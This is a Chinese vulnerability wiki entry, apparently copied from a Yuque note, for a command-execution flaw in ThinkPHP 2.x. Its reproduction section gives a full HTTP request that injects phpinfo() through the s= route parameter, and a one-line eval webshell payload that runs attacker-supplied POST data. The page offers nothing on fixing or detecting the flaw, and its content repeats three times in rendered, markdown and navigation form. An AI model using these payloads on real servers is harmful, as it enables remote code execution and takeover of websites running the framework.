fofamini-wiki

登录白背景

源码

thinkphp 2.x版本存在命令执行漏洞

一、漏洞简介

ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。thinkphp 2.x版本存在命令执行漏洞

二、影响版本

ThinkPHP 2.x

三、资产测绘

特征

四、漏洞复现

GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

/index.php?s=a/b/c/${@print(eval($_POST[1]))}

原文: https://www.yuque.com/xiaokp7/ocvun2/gtpt3ws4bks9sa74

# thinkphp 2.x版本存在命令执行漏洞

# 一、漏洞简介
ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。thinkphp 2.x版本存在命令执行漏洞

# 二、影响版本
+ ThinkPHP 2.x

# 三、资产测绘
+ 特征

![1729963450385-ca63c0c5-e3d3-461d-be0a-22c24501e875.png](./img/wPrI0RAzTSM936DJ/1729963450385-ca63c0c5-e3d3-461d-be0a-22c24501e875-744886.png)

# 四、漏洞复现
```plain
GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
```

![1729963319688-a53a6630-040e-4352-b588-781352923952.png](./img/wPrI0RAzTSM936DJ/1729963319688-a53a6630-040e-4352-b588-781352923952-631249.png)

```plain
/index.php?s=a/b/c/${@print(eval($_POST[1]))}
```

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gtpt3ws4bks9sa74>

fofamini-wiki

thinkphp 2.x版本存在命令执行漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>

三、资产测绘

四、漏洞复现